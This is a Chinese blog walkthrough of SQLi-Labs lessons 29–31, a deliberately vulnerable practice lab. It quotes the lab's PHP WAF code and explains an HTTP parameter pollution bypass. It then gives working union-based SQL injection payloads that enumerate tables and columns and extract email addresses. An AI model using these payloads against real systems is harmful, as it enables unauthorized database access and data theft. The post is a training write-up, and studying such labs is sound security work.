SQLi Labs Lesson29 & Lesson30 & Lesson31
2016-08-28 09:26
381 查看
Lesson - 29
GET - Error Based - IMPIDENCE MISMATCH - Having a WAF in front of Web Application
首先欢迎界面:构造 ?id=1,结果如图所示:
构造 ?id=1',页面被重定向,结果如图所示:
尝试双引号,括号。都被重定向,返回上述结果。
查看后台源代码。
后台whitelist函数:
function whitelist($input) { $match = preg_match("/^\d+$/", $input); if($match) { //echo "you are good"; //return $match; } else { header('Location: hacked.php'); //echo "you are bad"; } }
当$input不是数字时,重定向到其他页面。
后台java_implimentation函数:
function java_implimentation($query_string) { $q_s = $query_string; $qs_array= explode("&",$q_s); foreach($qs_array as $key => $value) { $val=substr($value,0,2); if($val=="id") { $id_value=substr($value,3,30); return $id_value; echo "<br>"; break; } } }
该函数,将query_string以'&'为分隔符,进行分割。
如果存在某个参数名称的前两个字符为"id",返回该参数值的substr(3,30)。
后台对query_string处理部分:
$qs = $_SERVER['QUERY_STRING']; $hint=$qs; $id1=java_implimentation($qs); $id=$_GET['id']; whitelist($id1); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
发现最后SQL语句中用到的$id,还是我们在URL中的输入的参数$id。
而白名单中进行的判断的是$id1。
PHP/Apache对相同名字的不同参数处理:
如:
GET /foo?id=1&id=2
$id=_GET['id']
结果$id=2
关于HTTP Parameter Pollution,AppsecEU09_CarettoniDiPaola_v0.8.pdf
构造如下query_string,绕过WAF
构造 ?id=1&id=0' union select 1,2,3--+
构造 ?id=1&id=0' union select 1,(select table_name from information_schema.tables where table_schema = database() limit 0,1),3 --+
获取当前数据库第一个表:
构造 ?id=1&id=0' union select 1,(select column_name from information_schema.columns where table_schema = database() and table_name = 'emails' limit 0,1),(select column_name from information_schema.columns where table_schema = database() and table_name = 'emails'
limit 1,1) --+
获取emails表的第一字段和第二字段:
构造 ?id=0' union select 1,(select email_id from emails limit 1,1),0--+
获取emails地址。
Lesson 30
GET - Blind - IMPIDENCE - MISMACTH - Having a WAF in front of web application
构造 ?id=1&id=0" union select 1,2,3--+Lesson 31
GET - Blind - IMPIDENCE - MISMACTH - Having a WAF in front of web application
构造 ?id=1&id=0") union select 1,2,3 --+相关文章推荐
- SQLi Labs Lesson32 & 33 & 34 & 35
- SQLi Labs Lesson27 & Lesson27a
- SQLi Labs Lesson28 & Lesson28a
- SQLi Labs Lesson25 & Lesson25a
- Lesson 29 Come in, Amy 进来,艾…
- sqli-labs ---- Less-8 & Less-9 & Less-10
- new SqlParameter("@content", SqlDbType.VarChar,30) 里的30,有30和没有写30有什么区别
- Sqli-labs学习SQL注入-Lesson 1-10总结
- SQLi Labs Challenges ( Lesson54 - Lesson65 )
- Lesson 29-30 Who is the real you
- SQLi Labs Lesson20
- SQLi Labs Lesson18
- sql注入之lesson5&6
- sqli-labs ---- Less-1 & Less-3 & Less-4
- Sqli-labs less 29
- SQLi Labs Stacked Injections ( Lesson38 - Lesson53 )
- SQLi Labs Lesson1
- JRE1.6.0_29 can't connect to Sql Server 2008R2 with Sqljdbc4.jar
- SQLi-Labs Lesson 1-8 notes
- SQLi Labs Lesson22